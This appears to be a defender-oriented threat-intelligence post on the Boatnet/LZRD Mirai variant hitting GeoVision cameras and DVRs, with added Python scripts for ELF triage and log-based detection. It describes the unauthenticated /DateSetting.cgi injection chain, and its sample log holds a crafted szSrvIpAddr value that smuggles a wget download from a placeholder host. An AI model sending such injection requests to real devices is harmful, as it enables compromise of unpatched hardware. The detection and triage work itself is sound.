A new wave of Mirai-based malware is actively compromising routers, cameras, and DVRs worldwide. Here's what defenders need to know.
Multiple new samples of Boatnet, a Mirai botnet variant linked to the LZRD campaign, were uploaded to ThreatChain within the last 24 hours. These ELF binaries target ARM and x86 IoT devices, exploiting known command injection vulnerabilities in GeoVision hardware. If you operate IoT infrastructure, read on.
Boatnet is the operational name for a family of Mirai-derived Linux binaries currently being distributed as part of the LZRD botnet campaign. First observed in late 2025 and surging in early 2026, Boatnet inherits the core Mirai playbook — brute-forcing IoT device credentials and exploiting unpatched firmware — but adds a refreshed exploit chain targeting specific CVEs in discontinued GeoVision surveillance equipment.
The name comes from the binary filenames used by the operators: boatnet.arm6, boatnet.arm7, boatnet.x86, boatnet.mips — each compiled for a different processor architecture to maximize the range of vulnerable devices.
Boatnet's infection sequence follows a well-defined kill chain that can compromise a vulnerable device in under 60 seconds:
1. The bot scans for the /DateSetting.cgi endpoint on port 80/443.
2. It injects a command through the szSrvIpAddr parameter; no authentication is required (CVE-2024-6047).
3. The injected command fetches the Boatnet payload with wget or curl from an attacker-controlled staging server.

CVE-2024-6047: Command injection in GeoVision devices via the /DateSetting.cgi endpoint. The szSrvIpAddr parameter fails to sanitize user input, allowing unauthenticated remote code execution. Affects discontinued GeoVision models with no patch available.

CVE-2024-11120: Additional command injection vector in GeoVision IoT devices. Exploited in tandem with CVE-2024-6047 to ensure compromise even when partial input filtering is present.
The following hashes were submitted to ThreatChain on April 4, 2026 and are now searchable in our threat database:
| Attribute | Value |
|---|---|
| File Type | ELF (Linux executable) |
| Architectures | ARM6, x86, MIPS |
| Packing | UPX (Ultimate Packer for eXecutables) |
| Malware Family | Mirai / LZRD |
| Origin Countries | Netherlands (NL), Germany (DE) |
| YARA Matches | botnet_Yakuza, Linux_Trojan_Gafgyt, Linux_Trojan_Mirai |
| AV Detections | 26/36 engines (72.2%) |
| Triage Score | 10/10 (confirmed malicious) |
| Vendor Tags | ReversingLabs: Linux.Worm.Mirai, Intezer: Mirai family, CERT-PL: mirai |
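The table above describes the samples as UPX-packed ELF binaries built for several architectures. The following Python script is an added triage helper, not ThreatChain's code: it reads the ELF header fields that identify the target CPU and endianness, and applies the common heuristic of looking for the "UPX!" magic that the UPX packer leaves in packed files. The inputs it is exercised on are constructed minimal headers, not real malware, so it can be run anywhere.

```python
"""Quick triage of an IoT ELF sample: architecture, endianness, UPX packing.

Added example (not ThreatChain's code). Works on raw file bytes, so a
quarantined sample can be inspected without executing it.
"""
import struct

# e_machine values from the ELF specification
EM_386 = 3
EM_MIPS = 8
EM_ARM = 40
EM_X86_64 = 62

MACHINE_NAMES = {EM_386: "x86", EM_MIPS: "MIPS", EM_ARM: "ARM", EM_X86_64: "x86-64"}


def parse_elf_header(data: bytes) -> dict:
    """Decode the parts of the ELF header needed for triage."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = data[4]  # 1 = 32-bit, 2 = 64-bit
    ei_data = data[5]   # 1 = little-endian, 2 = big-endian
    if ei_data not in (1, 2):
        raise ValueError("unknown ELF endianness")
    endian = "<" if ei_data == 1 else ">"
    # e_type and e_machine follow the 16-byte e_ident block and must be
    # read in the file's own byte order (IoT MIPS builds are often big-endian).
    e_type, e_machine = struct.unpack(endian + "HH", data[16:20])
    return {
        "bits": 32 if ei_class == 1 else 64,
        "endian": "little" if ei_data == 1 else "big",
        "machine": MACHINE_NAMES.get(e_machine, f"unknown(0x{e_machine:x})"),
        "executable": e_type == 2,  # ET_EXEC
    }


def looks_upx_packed(data: bytes) -> bool:
    """Heuristic: stock UPX writes a 'UPX!' magic into the packed file.

    A modified packer may strip it, so absence is not proof of 'not packed'.
    """
    return b"UPX!" in data


def triage(data: bytes) -> dict:
    info = parse_elf_header(data)
    info["upx"] = looks_upx_packed(data)
    return info


def make_fake_elf(machine: int, bits: int = 32, big_endian: bool = False,
                  upx: bool = False) -> bytes:
    """Constructed minimal header for demonstration only; not a runnable binary."""
    endian = ">" if big_endian else "<"
    ident = (b"\x7fELF"
             + bytes([1 if bits == 32 else 2, 2 if big_endian else 1, 1])
             + b"\x00" * 9)
    header = ident + struct.pack(endian + "HH", 2, machine)
    body = b"\x00" * 64 + (b"UPX!" if upx else b"") + b"\x00" * 64
    return header + body


if __name__ == "__main__":
    # Constructed samples standing in for boatnet.arm7 / boatnet.mips style files
    for name, blob in [
        ("arm-packed", make_fake_elf(EM_ARM, upx=True)),
        ("mips-be", make_fake_elf(EM_MIPS, big_endian=True)),
        ("x86", make_fake_elf(EM_386)),
    ]:
        print(name, triage(blob))
```

To use it on a quarantined file, read the bytes with `open(path, "rb").read()` and pass them to `triage()`; a packed hit should be unpacked (for example with `upx -d`) in the lab before any string or YARA analysis, since the packed form hides most indicators.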
Original Mirai source code leaked on HackForums. The IoT botnet era begins.
CVE-2024-6047 and CVE-2024-11120 disclosed for GeoVision IoT devices. No patches released (EOL hardware).
Akamai SIRT detects first Boatnet/LZRD exploitation of GeoVision devices in honeypots.
Barracuda reports massive DDoS surge from Kimwolf, Aisuru, and Mirai variant botnets including LZRD.
Fresh Boatnet samples uploaded to MalwareBazaar. ThreatChain indexes all IOCs within hours.
Boatnet represents a persistent truth in cybersecurity: abandoned hardware is an attacker's best friend. GeoVision discontinued the affected devices without issuing patches, leaving thousands of internet-facing cameras and DVRs permanently vulnerable. The LZRD operators know this — they're not discovering zero-days. They're farming devices that will never be fixed.
The broader Mirai ecosystem has now splintered into 116 distinct branches from over 21,000 samples. In 2026, three major botnets — Kimwolf, Aisuru, and Mirai variants like LZRD — are driving the most automated DDoS campaign the internet has ever seen. The barrier to entry is near zero: the source code is public, the targets are plentiful, and the victims don't know they're infected.
1. Inventory your IoT devices. If you have GeoVision cameras or DVRs, check if they're on the affected model list. If they are — disconnect them. There is no patch.
2. Block the IOCs. Add the hashes above to your EDR/SIEM. Search your network for connections to known LZRD C2 infrastructure.
3. Monitor for /DateSetting.cgi requests. Any HTTP request hitting this endpoint is almost certainly malicious. Alert on it.
4. Segment IoT networks. Cameras, printers, and smart devices should never share a network segment with critical infrastructure.
5. Disable UPnP. Many IoT devices use UPnP to punch holes in firewalls. Turn it off at the router level.
6. Enforce firmware lifecycle policies. If a vendor EOLs a device without patching known CVEs, replace it. The cost of a new camera is less than the cost of being part of a botnet.
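Step 3 above and the kill chain described earlier both come down to the same detection: any request to /DateSetting.cgi on a GeoVision device is suspect, and one whose szSrvIpAddr parameter carries shell metacharacters or a wget/curl fetch is an exploitation attempt in progress. The following Python script is an added example, not ThreatChain's code, that scans combined-format web access log lines (Apache/nginx style) and produces alerts at two severities. The log lines at the bottom are constructed samples using RFC 5737 documentation addresses and a placeholder staging host.

```python
"""Detect GeoVision /DateSetting.cgi exploitation attempts in web access logs.

Added example (not ThreatChain's code). Alerts on every request to the
endpoint, and escalates when the szSrvIpAddr value looks like an injection.
Caveat: access logs record only the request line, so a parameter sent in a
POST body is invisible here and needs a WAF or reverse-proxy log instead.
"""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Combined log format: src ident user [timestamp] "METHOD URL PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
TARGET_PATH = "/DateSetting.cgi"
SHELL_META = re.compile(r"[;|&`$]")            # command separators / substitution
FETCH_CMD = re.compile(r"\b(wget|curl)\b", re.I)  # stager commands named in the post


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated URL-encoding so %253B is seen as ';' too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify(line: str):
    """Return an alert dict for a suspicious line, or None for a benign one."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    if parts.path.lower() != TARGET_PATH.lower():
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    severity, reason = "medium", "request to " + TARGET_PATH
    for raw in params.get("szSrvIpAddr", []):
        value = fully_decode(raw)
        if SHELL_META.search(value) or FETCH_CMD.search(value):
            severity = "high"
            reason = "shell metacharacters or download command in szSrvIpAddr"
            break
    return {
        "src": m.group("src"),
        "ts": m.group("ts"),
        "status": int(m.group("status")),
        "severity": severity,
        "reason": reason,
    }


def scan(lines):
    """Run classify() over an iterable of log lines and collect the alerts."""
    return [alert for alert in map(classify, lines) if alert is not None]


# Constructed sample log lines (RFC 5737 addresses, placeholder staging host)
SAMPLE_LOG = [
    '203.0.113.9 - - [04/Apr/2026:10:15:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.23 - - [04/Apr/2026:10:15:07 +0000] "GET /DateSetting.cgi HTTP/1.1" 200 128',
    '198.51.100.23 - - [04/Apr/2026:10:15:09 +0000] '
    '"POST /DateSetting.cgi?szSrvIpAddr=192.0.2.1%3Bwget%20http%3A%2F%2Fstaging.example%2Fx HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(f"[{alert['severity'].upper()}] {alert['ts']} {alert['src']}: {alert['reason']}")
```

Feed it `sys.stdin` or a rotated log file in place of `SAMPLE_LOG`; the "medium" alerts are worth keeping because, as the post notes, legitimate traffic to this endpoint on an internet-facing camera is rare, and a source that hits it once and then again with a payload is the scan-then-exploit sequence of the kill chain.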
WARNING: Live Malware
These are real malicious Boatnet binaries. Download only in an isolated research environment (VM, air-gapped lab). Files delivered as password-protected ZIPs.
ZIP password: infected
ThreatChain indexes 2.6M+ threat indicators from MalwareBazaar, URLhaus, Feodo Tracker, ScamSniffer, and community submissions. Search any hash, domain, wallet, or IP — free.
Akamai SIRT — Active Exploitation of GeoVision IoT Devices
Barracuda — New Wave of Botnets Driving DDoS Chaos (2026)
Cloudflare — Inside Mirai: A Retrospective Analysis
MalwareBazaar — abuse.ch
ThreatChain — Decentralized Threat Intelligence
Published by ThreatChain Research · April 4, 2026 · threatchain.io